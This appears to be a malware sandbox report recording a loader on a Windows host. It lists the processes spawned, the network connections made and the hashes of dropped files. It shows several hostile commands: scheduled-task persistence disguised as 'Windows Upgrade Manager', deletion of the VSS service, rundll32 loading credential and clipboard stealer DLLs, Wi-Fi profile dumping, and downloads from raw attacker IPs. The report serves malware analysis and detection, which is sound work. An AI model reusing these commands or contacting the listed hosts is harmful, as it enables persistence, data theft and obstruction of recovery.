C:\Users\Admin\AppData\Local\Temp\1583029623.exe
C:\Users\Admin\AppData\Local\Temp\1583029623.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\http172.245.189.30ds.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http172.245.189.30ds.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe"
C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe" /F
C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe" -service -lunch
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe"
C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\http45.144.3.216Decrypter.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.144.3.216Decrypter.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C sc delete VSS
C:\Windows\system32\sc.exe
sc delete VSS
C:\Users\Admin\AppData\Local\Temp\http212.227.175.227nc.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http212.227.175.227nc.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe"
\??\c:\temp2\Autoit3.exe
"c:\temp2\Autoit3.exe" c:\temp2\script.a3x
\??\c:\windows\SysWOW64\cmd.exe
"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\ebakkah\hadhebc
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get domain
C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\735401866380_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\clip64.dll, Main
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| AE | 77.242.250.36:443 | tcp | |
| DZ | 197.115.102.247:443 | tcp | |
| CN | 47.97.113.146:443 | tcp | |
| US | 104.21.79.165:443 | funcaptcha.ru | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| HK | 107.148.237.220:443 | tcp | |
| US | 8.8.8.8:53 | 36.250.242.77.in-addr.arpa | udp |
| HK | 103.40.161.76:443 | tcp | |
| US | 173.44.141.7:443 | tcp | |
| CN | 62.234.18.252:443 | tcp | |
| CN | 111.230.12.238:443 | tcp | |
| CN | 8.134.11.7:443 | tcp | |
| CN | 1.15.248.225:443 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 45.11.229.96:56001 | strompreis.ru | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| CN | 8.138.23.74:443 | tcp | |
| CN | 47.97.114.109:443 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| SG | 150.109.21.231:443 | tcp | |
| KR | 210.114.11.173:443 | tcp | |
| CN | 118.190.104.55:443 | tcp | |
| HK | 83.229.127.20:443 | tcp | |
| HK | 8.217.142.203:443 | tcp | |
| JP | 47.91.14.8:443 | tcp | |
| HK | 103.253.43.175:443 | tcp | |
| CN | 47.97.79.97:443 | tcp | |
| CN | 47.100.104.74:443 | tcp | |
| CN | 124.222.43.134:443 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 45.11.229.96:56002 | strompreis.ru | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 44.223.138.151:443 | tcp | |
| HK | 83.229.127.19:443 | tcp | |
| TM | 91.202.233.141:80 | tcp | |
| US | 104.160.18.203:443 | tcp | |
| CN | 81.69.242.80:443 | tcp | |
| US | 47.83.19.135:443 | tcp | |
| CN | 119.91.61.117:443 | tcp | |
| TM | 91.202.233.141:80 | tcp | |
| US | 35.87.126.68:443 | tcp | |
| US | 142.171.177.156:443 | tcp | |
| US | 194.36.171.35:443 | tcp | |
| SG | 47.245.94.124:443 | tcp | |
| US | 8.8.8.8:53 | 156.177.171.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.126.87.35.in-addr.arpa | udp |
| TM | 91.202.233.141:80 | tcp | |
| US | 206.189.230.244:443 | tcp | |
| HK | 103.97.179.151:443 | tcp | |
| US | 34.44.155.8:443 | tcp | |
| CN | 120.53.236.103:443 | tcp | |
| US | 8.8.8.8:53 | 244.230.189.206.in-addr.arpa | udp |
| US | 24.199.120.22:443 | tcp | |
| JP | 216.73.158.126:443 | tcp | |
| US | 8.8.8.8:53 | 8.155.44.34.in-addr.arpa | udp |
| US | 172.86.114.26:443 | tcp | |
| CN | 110.41.60.130:443 | tcp | |
| HK | 8.217.222.41:443 | tcp | |
| SG | 43.153.222.28:443 | tcp | |
| CN | 124.221.111.211:443 | tcp | |
| TM | 91.202.233.141:80 | tcp | |
| CN | 59.110.136.135:443 | tcp | |
| CN | 101.132.182.180:443 | tcp | |
| TM | 91.202.233.141:80 | tcp | |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| CN | 192.144.229.25:443 | tcp | |
| BA | 77.221.27.219:40500 | udp | |
| RU | 78.36.17.105:40500 | tcp | |
| CN | 39.100.78.58:443 | tcp | |
| CN | 43.138.20.107:443 | tcp | |
| RU | 5.137.197.125:40500 | udp | |
| HK | 38.147.171.167:443 | tcp | |
| CN | 118.25.173.86:443 | tcp | |
| KZ | 178.91.66.151:40500 | udp | |
| CN | 47.93.166.228:443 | tcp | |
| CN | 8.138.43.240:443 | tcp | |
| MX | 189.173.0.44:40500 | udp | |
| KZ | 213.211.109.33:40500 | udp | |
| CN | 121.40.204.42:443 | tcp | |
| CN | 101.43.198.94:443 | tcp | |
| CN | 106.54.210.83:443 | tcp | |
| CN | 111.229.187.212:443 | tcp | |
| EG | 197.162.209.92:40500 | udp | |
| KZ | 95.59.162.2:40500 | tcp | |
| KZ | 2.135.246.18:40500 | udp | |
| CN | 106.53.181.113:443 | tcp | |
| CN | 49.232.157.82:443 | tcp | |
| KZ | 95.57.155.114:40500 | udp | |
| KZ | 89.218.234.2:40500 | udp | |
| SG | 47.236.19.63:443 | tcp | |
| HK | 47.76.230.250:443 | tcp | |
| CN | 106.55.102.97:443 | tcp | |
| SG | 8.152.170.232:443 | tcp | |
| US | 23.26.137.34:443 | tcp | |
| US | 172.245.53.132:443 | tcp | |
| CN | 101.42.247.112:443 | tcp | |
| SG | 119.8.162.77:443 | tcp | |
| UZ | 195.158.22.13:40500 | udp | |
| US | 8.8.8.8:53 | 13.22.158.195.in-addr.arpa | udp |
| CN | 112.126.77.173:443 | tcp | |
| US | 167.172.131.182:443 | tcp | |
| KZ | 2.135.207.165:40500 | udp | |
| KZ | 84.240.195.243:40500 | tcp | |
| US | 23.168.152.15:443 | tcp | |
| CN | 119.45.230.77:443 | tcp | |
| CN | 43.139.195.46:443 | tcp | |
| CN | 111.230.61.6:443 | tcp | |
| IR | 2.182.191.174:40500 | udp | |
| IR | 5.232.168.223:40500 | tcp | |
| IR | 188.212.237.201:40500 | udp | |
| CN | 120.53.120.95:443 | tcp | |
| SG | 47.236.74.146:443 | tcp | |
| KZ | 147.30.175.81:40500 | udp | |
| CN | 39.105.161.32:443 | tcp | |
| CN | 49.232.137.101:443 | tcp | |
| UZ | 213.230.69.54:40500 | udp | |
| CN | 47.93.216.2:443 | tcp | |
| CN | 101.201.54.74:443 | tcp | |
| BG | 94.232.46.54:443 | tcp | |
| CN | 110.40.138.5:443 | tcp | |
| KZ | 2.134.186.252:40500 | udp | |
| US | 103.143.248.179:80 | 103.143.248.179 | tcp |
| NL | 45.148.120.22:443 | tcp | |
| IR | 93.119.79.237:40500 | udp | |
| KZ | 213.211.109.33:40500 | tcp | |
| US | 154.9.254.227:443 | tcp | |
| CN | 116.62.169.135:443 | tcp | |
| HK | 47.243.165.127:80 | 47.243.165.127 | tcp |
| US | 8.8.8.8:53 | 227.254.9.154.in-addr.arpa | udp |
| CN | 106.14.8.52:80 | tcp | |
| US | 205.234.171.137:80 | tcp | |
| KZ | 178.89.79.66:40500 | udp | |
| HK | 156.255.2.100:80 | 156.255.2.100 | tcp |
| NL | 185.150.26.240:80 | tcp | |
| DZ | 41.102.169.93:40500 | udp | |
| CN | 47.109.106.162:80 | tcp | |
| JP | 47.245.37.54:443 | tcp | |
| CN | 124.71.136.141:80 | tcp | |
| US | 74.48.147.144:443 | tcp | |
| KZ | 2.133.69.160:40500 | udp | |
| YE | 89.189.87.223:40500 | udp | |
| US | 192.3.128.204:443 | tcp | |
| US | 70.35.206.129:80 | 70.35.206.129 | tcp |
| US | 104.254.244.97:80 | 104.254.244.97 | tcp |
| CA | 149.248.59.118:80 | tcp | |
| KZ | 92.47.86.254:40500 | udp | |
| DZ | 105.111.44.67:40500 | tcp | |
| BY | 178.124.145.4:40500 | udp | |
| KR | 141.164.41.117:80 | tcp | |
| US | 172.245.189.30:80 | 172.245.189.30 | tcp |
| FR | 194.59.30.59:80 | tcp | |
| FR | 194.59.30.59:80 | tcp | |
| KZ | 5.251.249.241:40500 | udp | |
| CI | 160.155.209.135:40500 | udp | |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| US | 69.166.230.221:80 | 69.166.230.221 | tcp |
| IR | 217.219.185.45:40500 | udp | |
| US | 8.8.8.8:53 | 214.75.66.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.185.219.217.in-addr.arpa | udp |
| US | 149.88.90.88:80 | 149.88.90.88 | tcp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| RU | 94.228.113.30:80 | 94.228.113.30 | tcp |
| US | 204.44.86.164:80 | 204.44.86.164 | tcp |
| KZ | 77.240.41.3:40500 | udp | |
| DE | 77.91.66.70:80 | tcp | |
| CN | 115.159.47.193:80 | tcp | |
| DE | 77.91.66.70:80 | tcp | |
| UZ | 217.30.162.37:40500 | tcp | |
| RU | 45.151.62.96:80 | 45.151.62.96 | tcp |
| NL | 94.156.68.202:80 | www.requimacofradian.site | tcp |
| RU | 45.144.3.216:80 | 45.144.3.216 | tcp |
| DE | 212.227.175.227:80 | 212.227.175.227 | tcp |
| RU | 45.150.25.234:40500 | udp | |
| HK | 47.243.175.24:8444 | 47.243.175.24 | tcp |
| CN | 212.129.223.49:80 | tcp | |
| US | 34.160.111.145:80 | myexternalip.com | tcp |
| US | 8.8.8.8:53 | 145.111.160.34.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:56582 | tcp | |
| SG | 118.194.233.185:80 | 118.194.233.185 | tcp |
| CN | 60.205.226.146:80 | tcp | |
| EG | 45.242.57.22:40500 | udp | |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| IR | 217.218.196.230:40500 | udp | |
| RU | 178.68.24.192:40500 | udp | |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| CN | 47.120.3.3:80 | tcp | |
| CN | 115.159.47.193:80 | tcp | |
| CN | 119.91.20.97:80 | tcp | |
| RU | 93.123.145.179:40500 | udp |
Files
memory/4012-1-0x00007FFB305F3000-0x00007FFB305F5000-memory.dmp
memory/4012-0-0x0000019C163C0000-0x0000019C163CA000-memory.dmp
memory/4012-2-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
| MD5 | 8d8e6c7952a9dc7c0c73911c4dbc5518 |
| SHA1 | 9098da03b33b2c822065b49d5220359c275d5e94 |
| SHA256 | feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278 |
| SHA512 | 91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645 |
C:\Users\Admin\AppData\Local\Temp\httpsfuncaptcha.ruhvnc.exe.exe
| MD5 | 7557af6f3185128c25aeb092dc335975 |
| SHA1 | f0866402529be2fdc0511305da069b69a8a35b8e |
| SHA256 | 5fcee9da2e237df74b7c2619bde63db40c92c2e6c51bd483c86f83dcdfde1eab |
| SHA512 | de6375e57a674ac063aecd499d8b7ff01ebaaafb7352ce560a2468293b3d7f7b95a5ac53751728ef0578adcb5bf0518ce08f55cd7bd3edd1c13b0a4866301e9b |
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
| MD5 | be9388b42333b3d4e163b0ace699897b |
| SHA1 | 4e1109772eb9cb59c557380822166fe1664403bd |
| SHA256 | d281e0a0f1e1073f2d290a7eb1f77bed4c210dbf83a0f4f4e22073f50faa843f |
| SHA512 | 5f887f1060b898c9a88745cde7cf509fdf42947ab8e5948b46c2df659468dc245b24d089bdbec0b314c40b83934698bf4b6feb8954e32810ff8f522aab0af19a |
memory/984-28-0x000000001B140000-0x000000001B21C000-memory.dmp
memory/984-22-0x0000000000540000-0x00000000005B4000-memory.dmp
memory/984-58-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-96-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-94-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-93-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-90-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-88-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-86-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-84-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-82-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-80-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-78-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-74-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-72-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-69-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-132-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
memory/984-70-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
memory/984-76-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-67-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-65-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-63-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-61-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-59-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-55-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-53-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-51-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-49-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-47-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-45-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-41-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-39-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-37-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-35-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-33-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-43-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-32-0x000000001B140000-0x000000001B216000-memory.dmp
memory/4012-5425-0x00007FFB305F3000-0x00007FFB305F5000-memory.dmp
memory/3176-6301-0x0000000002E80000-0x0000000002EB6000-memory.dmp
memory/3176-6302-0x0000000005550000-0x0000000005B7A000-memory.dmp
memory/3176-6303-0x0000000005480000-0x00000000054A2000-memory.dmp
memory/3176-6304-0x0000000005D70000-0x0000000005DD6000-memory.dmp
memory/3176-6305-0x0000000005DE0000-0x0000000005E46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p2pulqol.bkr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3176-6314-0x0000000005E50000-0x00000000061A7000-memory.dmp
memory/3176-6315-0x0000000006340000-0x000000000635E000-memory.dmp
memory/3176-6316-0x0000000006360000-0x00000000063AC000-memory.dmp
memory/5132-6320-0x000001EA5ABA0000-0x000001EA5ABC2000-memory.dmp
memory/3176-6330-0x000000006F230000-0x000000006F27C000-memory.dmp
memory/3176-6328-0x0000000007300000-0x0000000007334000-memory.dmp
memory/3176-6340-0x0000000006920000-0x000000000693E000-memory.dmp
memory/3176-6341-0x0000000007540000-0x00000000075E4000-memory.dmp
memory/3176-6344-0x0000000007D20000-0x000000000839A000-memory.dmp
memory/3176-6345-0x00000000076A0000-0x00000000076BA000-memory.dmp
memory/3176-6346-0x0000000007700000-0x000000000770A000-memory.dmp
memory/3176-6347-0x0000000007910000-0x00000000079A6000-memory.dmp
memory/3176-6348-0x00000000078A0000-0x00000000078B1000-memory.dmp
memory/3176-6349-0x00000000078D0000-0x00000000078DE000-memory.dmp
memory/3176-6350-0x00000000078E0000-0x00000000078F5000-memory.dmp
memory/3176-6351-0x00000000079D0000-0x00000000079EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3193133307.exe
| MD5 | af0622340ed8ba48efa92e0b2d9aca7b |
| SHA1 | 77e7181b4d4e6957cf13ba37f590cf219aac88cb |
| SHA256 | 7b7d433c6c204ed3bcd1ea74106592edfa1a30b6ef7bbc3ed21efcbadc51e526 |
| SHA512 | e1368c1c292789115b51cae549bd2d484dbc614eb3e57aa5fce324385d28e9fbddf60064b4c88237b38cded294d090d07c491b646651c45bcd6235630d94ef46 |
memory/3176-6355-0x00000000079C0000-0x00000000079C8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c5832682c75483acded1910871ed32fb |
| SHA1 | b50989ce07d133f85134f3649a3d5f119ded054a |
| SHA256 | a2994d9d3701395c9bf6e3b9c4d981d48ec91cb4c362ab91bb478ee603d02524 |
| SHA512 | 5789b50676315ebced61afed079c571538f7ffc40a1d7389f964d52c62ba5375c637af36487b87822c9d0c4a2e1f58a98d1d4f63e42dc0cddd98019304a9d307 |
memory/4012-6363-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
memory/984-6367-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\41933479.exe
| MD5 | 4fe8dc617311f7b6a4b8ebe0b1e24090 |
| SHA1 | 2bd9341f17c8c0c62e56e1863b1d2f9c43cb30e5 |
| SHA256 | 5016e413b0c563efc920165e7235c9f2706808877668bd297b41435acc7aade4 |
| SHA512 | 910a12fbaffd45b0f797a95c6678a32c4a27adbb7d1474f183f8863d310d31fbba17d5d747da87ac4a30dd7cb22c67a4d1c25b302ef0c3f6954d91a459c692db |
C:\Users\Admin\AppData\Local\Temp\1583029623.exe
| MD5 | 41ab08c1955fce44bfd0c76a64d1945a |
| SHA1 | 2b9cb05f4de5d98c541d15175d7f0199cbdd0eea |
| SHA256 | dd12cb27b3867341bf6ca48715756500d3ec56c19b21bb1c1290806aa74cb493 |
| SHA512 | 38834ae703a8541b4fec9a1db94cfe296ead58649bb1d4873b517df14d0c6a9d25e49ff04c2bf6bb0188845116a4e894aae930d849f9be8c98d2ce51da1ef116 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25506aa16cc8d6a53366ff2fca1422c0 |
| SHA1 | 4c8ed062fa6c589797660798df5e68793ddbaa45 |
| SHA256 | 73852c1215d9ef829fd689a5d709d6b5cf38ab3cfdbcc15f211d412a59b4dc71 |
| SHA512 | 453ea8c9e850c07699c4c7769a17f90e219a90d28d0fd2a61e2a19d9744caaad4debbd817147f7bf09bdacaad36536947a50cb1b64c52513b0ec6484e490ed8c |
C:\Users\Admin\AppData\Local\Temp\http103.143.248.17902.08.2022.exe.exe
| MD5 | 45651e980f6a3f54d418f925ad5f855c |
| SHA1 | 569dd0f22dea8a802d01e23ac549472c30904c72 |
| SHA256 | ef3c15be4026eb4d3f9c168d52e38cbf2c1c2f10625d713f18521c0c6e62f927 |
| SHA512 | 32966dd1f6ecfee6772ef3e5e2ea127bc4e8380be50f17dc7c7befc857b02c77edbd2c6dd98e09d549f53416cf92cb225e2aa7324b9c8c0e329a7092a36769cd |
C:\Users\Admin\AppData\Local\Temp\http172.245.189.30ds.exe.exe
| MD5 | 3b6b710da92a115329d00c5e55ad7671 |
| SHA1 | 489b2c96417490fd15419c93b953334f93581d28 |
| SHA256 | 60dd002cc2b269d41f167af937005bbf5f447df3997b4ecdf2397b9877d652ea |
| SHA512 | 6626804cacf522a9b33205a5ace276fc4de61f03a983ef5d35c8b0522b774ad48d0d58e431a07ca6089715482307b3974c5c87d65ff4ad3dd0a0008809e9578a |
memory/3576-6431-0x0000000000490000-0x00000000007D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe
| MD5 | 107c3b33e05d1d569cccc2052e56055e |
| SHA1 | e843ffcb2d67ec5778a66abce8ee3d162831dd90 |
| SHA256 | 6338b823d5172f0321814534c1d7aff08a60132c62de48c2752c2c7dfc191228 |
| SHA512 | 86955fa11b16ffe0063fff9a57cca4c1afa8823fc6c78eaa1f23ba75182652ef55523160356017dabb61d570882f302e23f9dc8b288740588572d00666159f81 |
C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe
| MD5 | 849c7ae770318ac09e0fde466e1becfe |
| SHA1 | 964328dce9404626ed5aaf9657b5a3aee93e4b86 |
| SHA256 | 84e1d7ef0ab4497dcebb07087479a40b523745523a292cb2da040b686b537a3d |
| SHA512 | 0f702ddab102f1e358ce80e80ac7c6f8c034a0e90b279330e2af4b448752dd897bdd037a081d940244fbc35ddefe99b95b15e05e6fade8374788d5b4098933f8 |
memory/5944-6453-0x0000000000530000-0x0000000000624000-memory.dmp
memory/5944-6461-0x0000000005540000-0x0000000005AE6000-memory.dmp
memory/5944-6463-0x0000000005030000-0x00000000050C2000-memory.dmp
memory/5944-6466-0x0000000004FA0000-0x0000000004FAA000-memory.dmp
memory/5944-6471-0x0000000005520000-0x0000000005538000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\735401866380
| MD5 | 2f09c5cf42377701ab98df521c528f52 |
| SHA1 | 812847ee4f1edf590c60a4007830f5877d49225a |
| SHA256 | 9a77aed076b962b086787d3a10d5f4420bb99be45a561aff2e11cb52155e048f |
| SHA512 | 074786ae2a0f3ef0191a4de721bedd85d511ac12958186f76f8c8af5a5c573386eafdf6a1e935973f54ad63fe2a2bcce2cbfa3468e8f0ff59e5bf9ac768e7338 |
C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe
| MD5 | b9fcbae32e294854e2507179d4acef1c |
| SHA1 | 88c7ae319270c49e2c6610e22bb54beaab533a10 |
| SHA256 | 5ee6cfb7dd10f7fecf03d515c60c8e319920ec1b99e9835f4fbcba8caa4b924c |
| SHA512 | ffd16a836c93485d71689884f1b9b114126d1f4bf3e070eeb1e6613b5337bfb19028bfe62b0339c0a38c3091cf8f1eaf286989f49b503ee06752000d85b49b99 |
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
| MD5 | 90aadf2247149996ae443e2c82af3730 |
| SHA1 | 050b7eba825412b24e3f02d76d7da5ae97e10502 |
| SHA256 | ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a |
| SHA512 | eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be |
C:\ProgramData\AMMYY\settings3.bin
| MD5 | cd54c0c946d86c8c47066629b45d990f |
| SHA1 | 7762473896d6b8b361b9af116de81449ba685933 |
| SHA256 | 6fd1c5b15e6d333c8a86f2e995e280b94dbda3ab6ad75214a81e15b42debe89d |
| SHA512 | c386f9926a6f5de6183ad77e900d62cf08e919d299288417650a88ce4d242c086b8cccd49483309c06309ff04d1fdf5b6469a14f7c34f2209a5b2a6f155a4168 |
C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe
| MD5 | 5a5ccdbe3cdd135a57f61138867932a8 |
| SHA1 | 172d5e86ce1862559546300816bcf7d2c749b4eb |
| SHA256 | 22f91304b04da17a6cb89365ddd5ad39b7bcb6fcf8d82a027381bb97e4ecb217 |
| SHA512 | b6ee3d40390fa49853522f73357264226dbca907de27da378b22702190d31ad3b9e65ba3dfb345470d380d34ebd22453a101e834a1ef123badf3a27f92079f20 |
